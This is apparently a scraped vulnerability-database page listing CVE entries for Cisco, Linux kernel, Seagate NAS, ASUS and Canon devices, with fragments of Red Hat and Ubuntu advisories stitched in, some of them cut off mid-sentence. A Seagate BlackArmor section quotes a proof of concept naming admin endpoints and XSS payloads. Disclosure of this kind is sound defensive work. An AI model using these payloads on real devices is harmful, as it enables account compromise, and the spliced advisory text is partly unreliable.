VARIoT IoT vulnerabilities database
| VAR-201401-0360 | CVE-2014-0654 | Cisco Context Directory Agent Cache modification vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cisco Context Directory Agent (CDA) allows remote attackers to modify the cache via a replay attack involving crafted RADIUS accounting messages, aka Bug ID CSCuj45383.
An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions.
This issue is being tracked by Cisco Bug ID CSCuj45383. The vulnerability is caused by the program not filtering RADIUS accounting messages sufficiently. A remote attacker could exploit this vulnerability to modify the cache through a redirection attack
| VAR-201401-0361 | CVE-2014-0655 | Cisco Adaptive Security Appliance Software Identity Firewall user cache modification vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
The Identity Firewall (IDFW) functionality in Cisco Adaptive Security Appliance (ASA) Software allows remote attackers to change the user-cache contents via a replay attack involving crafted RADIUS Change of Authorization (CoA) messages, aka Bug ID CSCuj45332.
Successfully exploiting this issue will allow an attacker to perform replay attacks. This may lead to other attacks.
This issue is being tracked by Cisco Bug ID CSCuj45332
| VAR-201401-0362 | CVE-2014-0656 | Cisco Context Directory Agent user-interface data omission vulnerability |
CVSS V2: 4.0 CVSS V3: - Severity: MEDIUM |
Cisco Context Directory Agent (CDA) allows remote authenticated users to trigger the omission of certain user-interface data via crafted field values, aka Bug ID CSCuj45353.
An attacker can exploit this issue to hide values from displaying in the CDA user interface. This may also aid in launching further attacks. Cisco Context Directory Agent (CDA) is a Cisco product that runs on Cisco Linux machines and monitors Active Directory Domain Controller (DC) authentication and other related events in real time. A security vulnerability exists in Cisco CDA
| VAR-201401-0363 | CVE-2014-0657 | Cisco Unified Communications Manager Unauthorized Access Vulnerability |
CVSS V2: 4.0 CVSS V3: - Severity: MEDIUM |
The administration portal in Cisco Unified Communications Manager (Unified CM) 9.1(1) and earlier does not properly handle role restrictions, which allows remote authenticated users to bypass role-based access control via multiple visits to a forbidden portal URL, aka Bug ID CSCuj83540. This may aid in further attacks.
This issue is being tracked by Cisco Bug ID CSCuj83540. Cisco Unified Communications Manager provides a scalable, distributed and highly available enterprise IP telephony call processing solution. The vulnerability is caused by the program not properly managing role permissions
| VAR-201401-0358 | CVE-2014-0652 | Cisco Context Directory Agent Cross-site scripting vulnerability in the mapping page |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in the Mappings page in Cisco Context Directory Agent (CDA) allows remote attackers to inject arbitrary web script or HTML via a crafted URL, aka Bug ID CSCuj45358.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue is being tracked by Cisco Bug ID CSCuj45358
| VAR-201406-0230 | CVE-2014-4027 | Linux kernel drivers/target/target_core_rd.c rd_build_device_space function information disclosure vulnerability |
CVSS V2: 2.3 CVSS V3: - Severity: LOW |
The rd_build_device_space function in drivers/target/target_core_rd.c in the Linux kernel before 3.14 does not properly initialize a certain data structure, which allows local users to obtain sensitive information from ramdisk_mcp memory by leveraging access to a SCSI initiator. Linux Kernel is prone to an information-disclosure vulnerability.
An attacker can exploit this issue to obtain sensitive information; information obtained may aid in other attacks.
Linux Kernel 2.6.38 through versions prior to 3.14 are affected. NFSv4 is a distributed file system protocol. The vulnerability is due to the program not initializing the data structure correctly. (CVE-2014-4943)
Michael S.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Important: kernel security and bug fix update
Advisory ID: RHSA-2014:1971-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1971.html
Issue date: 2014-12-09
CVE Names: CVE-2013-2929 CVE-2014-1739 CVE-2014-3181
CVE-2014-3182 CVE-2014-3184 CVE-2014-3185
CVE-2014-3186 CVE-2014-3631 CVE-2014-3673
CVE-2014-3687 CVE-2014-3688 CVE-2014-4027
CVE-2014-4652 CVE-2014-4654 CVE-2014-4655
CVE-2014-4656 CVE-2014-5045 CVE-2014-6410
=====================================================================
1. Summary:
Updated kernel packages that fix multiple security issues and several bugs
are now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having Important security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - noarch, x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64
Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64
3. Description:
* A flaw was found in the way the Linux kernel's SCTP implementation
handled malformed or duplicate Address Configuration Change Chunks
(ASCONF). A remote attacker could use either of these flaws to crash the
system. (CVE-2014-3673, CVE-2014-3687, Important)
* A flaw was found in the way the Linux kernel's SCTP implementation
handled the association's output queue. A remote attacker could send
specially crafted packets that would cause the system to use an excessive
amount of memory, leading to a denial of service. (CVE-2014-3688,
Important)
* Two flaws were found in the way the Apple Magic Mouse/Trackpad
multi-touch driver and the Minibox PicoLCD driver handled invalid HID
reports. An attacker with physical access to the system could use these
flaws to crash the system or, potentially, escalate their privileges on the
system. (CVE-2014-3181, CVE-2014-3186, Moderate)
* A memory corruption flaw was found in the way the USB ConnectTech
WhiteHEAT serial driver processed completion commands sent via USB Request
Blocks buffers. An attacker with physical access to the system could use
this flaw to crash the system or, potentially, escalate their privileges on
the system. (CVE-2014-3185, Moderate)
* A flaw was found in the way the Linux kernel's keys subsystem handled the
termination condition in the associative array garbage collection
functionality. A local, unprivileged user could use this flaw to crash the
system. (CVE-2014-3631, Moderate)
* Multiple flaws were found in the way the Linux kernel's ALSA
implementation handled user controls. A local, privileged user could use
either of these flaws to crash the system. (CVE-2014-4654, CVE-2014-4655,
CVE-2014-4656, Moderate)
* A flaw was found in the way the Linux kernel's VFS subsystem handled
reference counting when performing unmount operations on symbolic links.
A local, unprivileged user could use this flaw to exhaust all available
memory on the system or, potentially, trigger a use-after-free error,
resulting in a system crash or privilege escalation. (CVE-2014-5045,
Moderate)
* A flaw was found in the way the get_dumpable() function return value was
interpreted in the ptrace subsystem of the Linux kernel. When
'fs.suid_dumpable' was set to 2, a local, unprivileged local user could
use this flaw to bypass intended ptrace restrictions and obtain
potentially sensitive information. (CVE-2013-2929, Low)
* A stack overflow flaw caused by infinite recursion was found in the way
the Linux kernel's UDF file system implementation processed indirect ICBs.
An attacker with physical access to the system could use a specially
crafted UDF image to crash the system. (CVE-2014-1739,
Low)
* An out-of-bounds read flaw in the Logitech Unifying receiver driver could
allow an attacker with physical access to the system to crash the system
or, potentially, escalate their privileges on the system. (CVE-2014-3182,
Low)
* Multiple out-of-bounds write flaws were found in the way the Cherry
Cymotion keyboard driver, KYE/Genius device drivers, Logitech device
drivers, Monterey Genius KB29E keyboard driver, Petalynx Maxter remote
control driver, and Sunplus wireless desktop driver handled invalid HID
reports. An attacker with physical access to the system could use either of
these flaws to write data past an allocated memory buffer. (CVE-2014-3184,
Low)
* An information leak flaw in the RAM Disks Memory Copy (rd_mcp) back end
driver of the iSCSI Target subsystem could allow a privileged user to leak
the contents of kernel memory to an iSCSI initiator remote client.
(CVE-2014-4652, Low)
4. Solution:
Red Hat would like to thank Frey Alfredsson for reporting CVE-2014-3631,
and Vasily Averin of Parallels for reporting CVE-2014-5045. The
CVE-2014-3673 was discovered by Liu Wei of Red Hat.
All kernel users are advised to upgrade to these updated packages, which
contain backported patches to correct these issues. The system must be
rebooted for this update to take effect.
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the
Red Hat Network to apply this update are available at
https://access.redhat.com/articles/11258
To install kernel packages manually, use "rpm -ivh [package]". Do not use
"rpm -Uvh" as that will remove the running kernel binaries from your
system. You may use "rpm -e" to remove old kernels after determining that
the new kernel functions properly on your system.
5. Bugs fixed (https://bugzilla.redhat.com/):
1028148 - CVE-2013-2929 kernel: exec/ptrace: get_dumpable() incorrect tests
1108744 - CVE-2014-4027 Kernel: target/rd: information leakage
1109774 - CVE-2014-1739 Kernel: drivers: media: an information leakage
1113406 - CVE-2014-4652 Kernel: ALSA: control: protect user controls against races & memory disclosure
1113445 - CVE-2014-4654 CVE-2014-4655 Kernel: ALSA: control: use-after-free in replacing user controls
1113470 - CVE-2014-4656 Kernel: ALSA: control: integer overflow in id.index & id.numid
1122472 - CVE-2014-5045 kernel: vfs: refcount issues during unmount on symlink
1140325 - CVE-2014-3631 kernel: keys: incorrect termination condition in assoc array garbage collection
1141173 - CVE-2014-3181 Kernel: HID: OOB write in magicmouse driver
1141210 - CVE-2014-3182 Kernel: HID: logitech-dj OOB array access
1141391 - CVE-2014-3184 Kernel: HID: off by one error in various _report_fixup routines
1141400 - CVE-2014-3185 Kernel: USB serial: memory corruption flaw
1141407 - CVE-2014-3186 Kernel: HID: memory corruption via OOB write
1141809 - CVE-2014-6410 kernel: udf: Avoid infinite loop when processing indirect ICBs
1147850 - CVE-2014-3673 kernel: sctp: skb_over_panic when receiving malformed ASCONF chunks
1155731 - CVE-2014-3687 kernel: net: sctp: fix panic on duplicate ASCONF chunks
1155745 - CVE-2014-3688 kernel: net: sctp: remote memory pressure from excessive queueing
6. Package List:
Red Hat Enterprise Linux Client (v. 7):
Source:
kernel-3.10.0-123.13.1.el7.src.rpm
noarch:
kernel-abi-whitelists-3.10.0-123.13.1.el7.noarch.rpm
x86_64:
kernel-3.10.0-123.13.1.el7.x86_64.rpm
kernel-debug-3.10.0-123.13.1.el7.x86_64.rpm
kernel-debug-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm
kernel-debug-devel-3.10.0-123.13.1.el7.x86_64.rpm
kernel-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-123.13.1.el7.x86_64.rpm
kernel-devel-3.10.0-123.13.1.el7.x86_64.rpm
kernel-headers-3.10.0-123.13.1.el7.x86_64.rpm
kernel-tools-3.10.0-123.13.1.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm
kernel-tools-libs-3.10.0-123.13.1.el7.x86_64.rpm
perf-3.10.0-123.13.1.el7.x86_64.rpm
perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
noarch:
kernel-doc-3.10.0-123.13.1.el7.noarch.rpm
x86_64:
kernel-debug-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm
kernel-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-123.13.1.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm
kernel-tools-libs-devel-3.10.0-123.13.1.el7.x86_64.rpm
perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm
python-perf-3.10.0-123.13.1.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source:
kernel-3.10.0-123.13.1.el7.src.rpm
noarch:
kernel-abi-whitelists-3.10.0-123.13.1.el7.noarch.rpm
x86_64:
kernel-3.10.0-123.13.1.el7.x86_64.rpm
kernel-debug-3.10.0-123.13.1.el7.x86_64.rpm
kernel-debug-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm
kernel-debug-devel-3.10.0-123.13.1.el7.x86_64.rpm
kernel-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-123.13.1.el7.x86_64.rpm
kernel-devel-3.10.0-123.13.1.el7.x86_64.rpm
kernel-headers-3.10.0-123.13.1.el7.x86_64.rpm
kernel-tools-3.10.0-123.13.1.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm
kernel-tools-libs-3.10.0-123.13.1.el7.x86_64.rpm
perf-3.10.0-123.13.1.el7.x86_64.rpm
perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
noarch:
kernel-doc-3.10.0-123.13.1.el7.noarch.rpm
x86_64:
kernel-debug-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm
kernel-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-123.13.1.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm
kernel-tools-libs-devel-3.10.0-123.13.1.el7.x86_64.rpm
perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm
python-perf-3.10.0-123.13.1.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source:
kernel-3.10.0-123.13.1.el7.src.rpm
noarch:
kernel-abi-whitelists-3.10.0-123.13.1.el7.noarch.rpm
ppc64:
kernel-3.10.0-123.13.1.el7.ppc64.rpm
kernel-bootwrapper-3.10.0-123.13.1.el7.ppc64.rpm
kernel-debug-3.10.0-123.13.1.el7.ppc64.rpm
kernel-debug-debuginfo-3.10.0-123.13.1.el7.ppc64.rpm
kernel-debug-devel-3.10.0-123.13.1.el7.ppc64.rpm
kernel-debuginfo-3.10.0-123.13.1.el7.ppc64.rpm
kernel-debuginfo-common-ppc64-3.10.0-123.13.1.el7.ppc64.rpm
kernel-devel-3.10.0-123.13.1.el7.ppc64.rpm
kernel-headers-3.10.0-123.13.1.el7.ppc64.rpm
kernel-tools-3.10.0-123.13.1.el7.ppc64.rpm
kernel-tools-debuginfo-3.10.0-123.13.1.el7.ppc64.rpm
kernel-tools-libs-3.10.0-123.13.1.el7.ppc64.rpm
perf-3.10.0-123.13.1.el7.ppc64.rpm
perf-debuginfo-3.10.0-123.13.1.el7.ppc64.rpm
python-perf-debuginfo-3.10.0-123.13.1.el7.ppc64.rpm
s390x:
kernel-3.10.0-123.13.1.el7.s390x.rpm
kernel-debug-3.10.0-123.13.1.el7.s390x.rpm
kernel-debug-debuginfo-3.10.0-123.13.1.el7.s390x.rpm
kernel-debug-devel-3.10.0-123.13.1.el7.s390x.rpm
kernel-debuginfo-3.10.0-123.13.1.el7.s390x.rpm
kernel-debuginfo-common-s390x-3.10.0-123.13.1.el7.s390x.rpm
kernel-devel-3.10.0-123.13.1.el7.s390x.rpm
kernel-headers-3.10.0-123.13.1.el7.s390x.rpm
kernel-kdump-3.10.0-123.13.1.el7.s390x.rpm
kernel-kdump-debuginfo-3.10.0-123.13.1.el7.s390x.rpm
kernel-kdump-devel-3.10.0-123.13.1.el7.s390x.rpm
perf-3.10.0-123.13.1.el7.s390x.rpm
perf-debuginfo-3.10.0-123.13.1.el7.s390x.rpm
python-perf-debuginfo-3.10.0-123.13.1.el7.s390x.rpm
x86_64:
kernel-3.10.0-123.13.1.el7.x86_64.rpm
kernel-debug-3.10.0-123.13.1.el7.x86_64.rpm
kernel-debug-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm
kernel-debug-devel-3.10.0-123.13.1.el7.x86_64.rpm
kernel-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-123.13.1.el7.x86_64.rpm
kernel-devel-3.10.0-123.13.1.el7.x86_64.rpm
kernel-headers-3.10.0-123.13.1.el7.x86_64.rpm
kernel-tools-3.10.0-123.13.1.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm
kernel-tools-libs-3.10.0-123.13.1.el7.x86_64.rpm
perf-3.10.0-123.13.1.el7.x86_64.rpm
perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
noarch:
kernel-doc-3.10.0-123.13.1.el7.noarch.rpm
ppc64:
kernel-debug-debuginfo-3.10.0-123.13.1.el7.ppc64.rpm
kernel-debuginfo-3.10.0-123.13.1.el7.ppc64.rpm
kernel-debuginfo-common-ppc64-3.10.0-123.13.1.el7.ppc64.rpm
kernel-tools-debuginfo-3.10.0-123.13.1.el7.ppc64.rpm
kernel-tools-libs-devel-3.10.0-123.13.1.el7.ppc64.rpm
perf-debuginfo-3.10.0-123.13.1.el7.ppc64.rpm
python-perf-3.10.0-123.13.1.el7.ppc64.rpm
python-perf-debuginfo-3.10.0-123.13.1.el7.ppc64.rpm
s390x:
kernel-debug-debuginfo-3.10.0-123.13.1.el7.s390x.rpm
kernel-debuginfo-3.10.0-123.13.1.el7.s390x.rpm
kernel-debuginfo-common-s390x-3.10.0-123.13.1.el7.s390x.rpm
kernel-kdump-debuginfo-3.10.0-123.13.1.el7.s390x.rpm
perf-debuginfo-3.10.0-123.13.1.el7.s390x.rpm
python-perf-3.10.0-123.13.1.el7.s390x.rpm
python-perf-debuginfo-3.10.0-123.13.1.el7.s390x.rpm
x86_64:
kernel-debug-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm
kernel-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-123.13.1.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm
kernel-tools-libs-devel-3.10.0-123.13.1.el7.x86_64.rpm
perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm
python-perf-3.10.0-123.13.1.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source:
kernel-3.10.0-123.13.1.el7.src.rpm
noarch:
kernel-abi-whitelists-3.10.0-123.13.1.el7.noarch.rpm
x86_64:
kernel-3.10.0-123.13.1.el7.x86_64.rpm
kernel-debug-3.10.0-123.13.1.el7.x86_64.rpm
kernel-debug-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm
kernel-debug-devel-3.10.0-123.13.1.el7.x86_64.rpm
kernel-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-123.13.1.el7.x86_64.rpm
kernel-devel-3.10.0-123.13.1.el7.x86_64.rpm
kernel-headers-3.10.0-123.13.1.el7.x86_64.rpm
kernel-tools-3.10.0-123.13.1.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm
kernel-tools-libs-3.10.0-123.13.1.el7.x86_64.rpm
perf-3.10.0-123.13.1.el7.x86_64.rpm
perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
noarch:
kernel-doc-3.10.0-123.13.1.el7.noarch.rpm
x86_64:
kernel-debug-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm
kernel-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-123.13.1.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm
kernel-tools-libs-devel-3.10.0-123.13.1.el7.x86_64.rpm
perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm
python-perf-3.10.0-123.13.1.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2013-2929
https://access.redhat.com/security/cve/CVE-2014-1739
https://access.redhat.com/security/cve/CVE-2014-3181
https://access.redhat.com/security/cve/CVE-2014-3182
https://access.redhat.com/security/cve/CVE-2014-3184
https://access.redhat.com/security/cve/CVE-2014-3185
https://access.redhat.com/security/cve/CVE-2014-3186
https://access.redhat.com/security/cve/CVE-2014-3631
https://access.redhat.com/security/cve/CVE-2014-3673
https://access.redhat.com/security/cve/CVE-2014-3687
https://access.redhat.com/security/cve/CVE-2014-3688
https://access.redhat.com/security/cve/CVE-2014-4027
https://access.redhat.com/security/cve/CVE-2014-4652
https://access.redhat.com/security/cve/CVE-2014-4654
https://access.redhat.com/security/cve/CVE-2014-4655
https://access.redhat.com/security/cve/CVE-2014-4656
https://access.redhat.com/security/cve/CVE-2014-5045
https://access.redhat.com/security/cve/CVE-2014-6410
https://access.redhat.com/security/updates/classification/#important
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFUh2CJXlSAg2UNWIIRArzSAJ95AhqaUI998VyNBJGQaTXfSHeJuQCdFjTp
6IsJOT0XYi+TiyneMDOm9f4=
=a0Ai
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. Relevant releases/architectures:
MRG Realtime for RHEL 6 Server v.2 - noarch, x86_64
3. (CVE-2014-3153, Important)
* It was found that the Linux kernel's ptrace subsystem allowed a traced
process' instruction pointer to be set to a non-canonical memory address
without forcing the non-sysret code path when returning to user space. (CVE-2014-4699,
Important)
Note: The CVE-2014-4699 issue only affected systems using an Intel CPU.
* It was found that the permission checks performed by the Linux kernel
when a netlink message was received were not sufficient. (CVE-2014-0181, Moderate)
* It was found that the aio_read_events_ring() function of the Linux
kernel's Asynchronous I/O (AIO) subsystem did not properly sanitize the AIO
ring head received from user space. (CVE-2014-0206, Moderate)
* An out-of-bounds memory access flaw was found in the Netlink Attribute
extension of the Berkeley Packet Filter (BPF) interpreter functionality in
the Linux kernel's networking implementation. Google acknowledges Pinkie Pie as the original
reporter of CVE-2014-3153.
Bugs fixed (https://bugzilla.redhat.com/):
1094265 - CVE-2014-0181 kernel: net: insufficient permision checks of netlink messages
1094602 - CVE-2014-0206 kernel: aio: insufficient sanitization of head in aio_read_events_ring()
1096775 - CVE-2014-3144 CVE-2014-3145 Kernel: filter: prevent nla extensions to peek beyond the end of the message
1102571 - CVE-2014-3917 kernel: DoS with syscall auditing
1103626 - CVE-2014-3153 kernel: futex: pi futexes requeue issue
1104097 - CVE-2014-3940 Kernel: missing check during hugepage migration
1108744 - CVE-2014-4027 Kernel: target/rd: information leakage
1113967 - CVE-2014-4667 kernel: sctp: sk_ack_backlog wrap-around problem
1115927 - CVE-2014-4699 kernel: x86_64: ptrace: sysret to non-canonical address
6.
============================================================================
Ubuntu Security Notice USN-2337-1
September 02, 2014
linux vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 LTS
Summary:
Several security issues were fixed in the kernel. A guest OS user could exploit this
flaw to cause a denial of service (host OS crash). (CVE-2014-0155)
Andy Lutomirski discovered a flaw in the authorization of netlink socket
operations when a socket is passed to a process of more privilege.
(CVE-2014-0181)
An information leak was discovered in the Linux kernel's
aio_read_events_ring function. (CVE-2014-4027)
Sasha Levin reported an issue with the Linux kernel's shared memory
subsystem when used with range notifications and hole punching. (CVE-2014-4171)
Toralf Förster reported an error in the Linux kernel's syscall auditing on
32-bit x86 platforms. (CVE-2014-4667)
Vasily Averin discovered a reference count flaw during attempts to umount in
conjunction with a symlink. (CVE-2014-5045)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 14.04 LTS:
linux-image-3.13.0-35-generic 3.13.0-35.62
linux-image-3.13.0-35-generic-lpae 3.13.0-35.62
linux-image-3.13.0-35-lowlatency 3.13.0-35.62
linux-image-3.13.0-35-powerpc-e500 3.13.0-35.62
linux-image-3.13.0-35-powerpc-e500mc 3.13.0-35.62
linux-image-3.13.0-35-powerpc-smp 3.13.0-35.62
linux-image-3.13.0-35-powerpc64-emb 3.13.0-35.62
linux-image-3.13.0-35-powerpc64-smp 3.13.0-35.62
After a standard system update you need to reboot your computer to make
all the necessary changes.
ATTENTION: Due to an unavoidable ABI change the kernel updates have
been given a new version number, which requires you to recompile and
reinstall all third party kernel modules you might have installed. Unless you
manually uninstalled the standard kernel metapackages (e.g. linux-generic,
linux-server, linux-powerpc), a standard system upgrade will automatically
perform this as well.
| VAR-201401-0160 | CVE-2013-6922 | Seagate BlackArmor NAS 220 Device firmware cross-site request forgery vulnerability |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Multiple cross-site request forgery (CSRF) vulnerabilities in the Seagate BlackArmor NAS 220 devices with firmware sg2000-2000.1331 allow remote attackers to hijack the authentication of administrators for requests that (1) add user accounts via a crafted request to admin/access_control_user_add.php; (2) modify or (3) delete user accounts; (4) perform a factory reset; (5) perform a device reboot; or (6) add, (7) modify, or (8) delete shares and volumes. The Seagate BlackArmor NAS is a network storage device. BlackArmor NAS 220 storage server is prone to the following remote security vulnerabilities:
1. Multiple cross-site request forgery vulnerabilities
2. Multiple HTML-injection vulnerabilities
3. An arbitrary code-execution vulnerability
Attackers can exploit these issues to perform certain unauthorized actions, execute HTML and script code and steal cookie-based authentication credentials and execute arbitrary code. Other attacks are possible.
BlackArmor NAS 220 running firmware sg2000-2000.1331 is vulnerable; other versions may also be affected. It can provide layered protection, incremental data backup and system backup and recovery for business-critical data
| VAR-201401-0161 | CVE-2013-6923 | Seagate BlackArmor NAS 220 Cross-site scripting vulnerability in device firmware |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Multiple cross-site scripting (XSS) vulnerabilities in Seagate BlackArmor NAS 220 devices with firmware sg2000-2000.1331 allow remote attackers to inject arbitrary web script or HTML via the (1) fullname parameter to admin/access_control_user_edit.php or (2) workname parameter to admin/network_workgroup_domain.php. The Seagate BlackArmor NAS is a network storage device. The workgroup configuration is subject to a persistent cross-site scripting attack. When a user is added to the device, the application does not properly filter the user name field data, allowing the attacker to exploit the vulnerability to inject malicious scripts or HTML code. BlackArmor NAS 220 storage server is prone to the following remote security vulnerabilities:
1. Multiple cross-site request forgery vulnerabilities
2. Multiple HTML-injection vulnerabilities
3. An arbitrary code-execution vulnerability
Attackers can exploit these issues to perform certain unauthorized actions, execute HTML and script code and steal cookie-based authentication credentials and execute arbitrary code. Other attacks are possible.
BlackArmor NAS 220 running firmware sg2000-2000.1331 is vulnerable; other versions may also be affected. It can provide layered protection, incremental data backup and system backup and recovery for business-critical data. The vulnerability is caused by the admin/access_control_user_edit.php script not adequately filtering the 'fullname' parameter and the admin/network_workgroup_domain.php script not properly filtering the 'workname' parameter.
# Exploit Title: Seagate BlackArmor NAS - Multiple Persistent Cross Site Scripting Vulnerabilities
# Google Dork: N/A
# Date: 04-01-2014
# Exploit Author: Jeroen - IT Nerdbox
# Vendor Homepage: http://www.seagate.com/
# Software Link: http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/
# Version: sg2000-2000.1331
# Tested on: N/A
# CVE : CVE-2013-6923
#
## Description:
#
# When adding a user to the device, it is possible to enter a full name. This input field does not
# sanitize its input and it is possible to enter any payload which will get executed upon reload.
# The Work Group name input field does not sanitize its input.
#
# This vulnerability was reported to Seagate in September 2013; they stated that this will not be fixed.
#
## Proof of Concept #1:
#
# POST: http(s)://<url | ip>/admin/access_control_user_edit.php?id=2&lang=en
# Parameters:
#
# index = 2
# fullname = <script>alert(1);</script>
# submit = Submit
#
#
## Proof of Concept #2:
#
# POST: http(s)://<url | ip>/admin/network_workgroup_domain.php?lang=en&gi=n003
# Parameter:
#
# workname = "><input onmouseover=prompt(1) >
| VAR-201401-0754 | No CVE | Multiple ASUS RT Routers Remote Security Bypass Vulnerability |
CVSS V2: - CVSS V3: - Severity: - |
Multiple ASUS RT routers are prone to an unspecified security bypass vulnerability.
Attackers can exploit this issue to bypass certain security restrictions and perform unauthorized actions on the affected application. This may aid in further attacks.
ASUS RT-AC68U, RT-AC56U, RT-AC66U, RT-N66U, RT-N16 are vulnerable.
| VAR-201710-0032 | CVE-2013-6924 | Seagate BlackArmor NAS Command injection vulnerability in device firmware |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
Seagate BlackArmor NAS devices with firmware sg2000-2000.1331 allow remote attackers to execute arbitrary commands via shell metacharacters in the ip parameter to backupmgt/getAlias.php. The Seagate BlackArmor NAS device firmware contains a command injection vulnerability. Information may be obtained or altered, and the device may be put into a denial-of-service (DoS) state. The Seagate BlackArmor NAS is a network storage device. BlackArmor NAS 220 storage server is prone to the following remote security vulnerabilities:
1. Multiple cross-site request forgery vulnerabilities
2. Multiple HTML-injection vulnerabilities
3. An arbitrary code-execution vulnerability
Attackers can exploit these issues to perform certain unauthorized actions, execute HTML and script code and steal cookie-based authentication credentials and execute arbitrary code. Other attacks are possible.
BlackArmor NAS 220 running firmware sg2000-2000.1331 is vulnerable; other versions may also be affected. Seagate BlackArmor NAS is a network storage server from Seagate Corporation of the United States, which can provide layered protection, incremental data backup and system backup and recovery for business-critical data
| VAR-201404-0755 | No CVE | Canon PIXMA MX722 Printer Information Disclosure Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Canon is a well-known printer manufacturer based in Japan. An information disclosure vulnerability exists in the Canon PIXMA MX722 printer. A remote attacker can obtain the WPA2 password because the device exposes it in plaintext on an unprotected configuration page reachable over the network. Canon PIXMA MX722 is prone to an information-disclosure vulnerability.
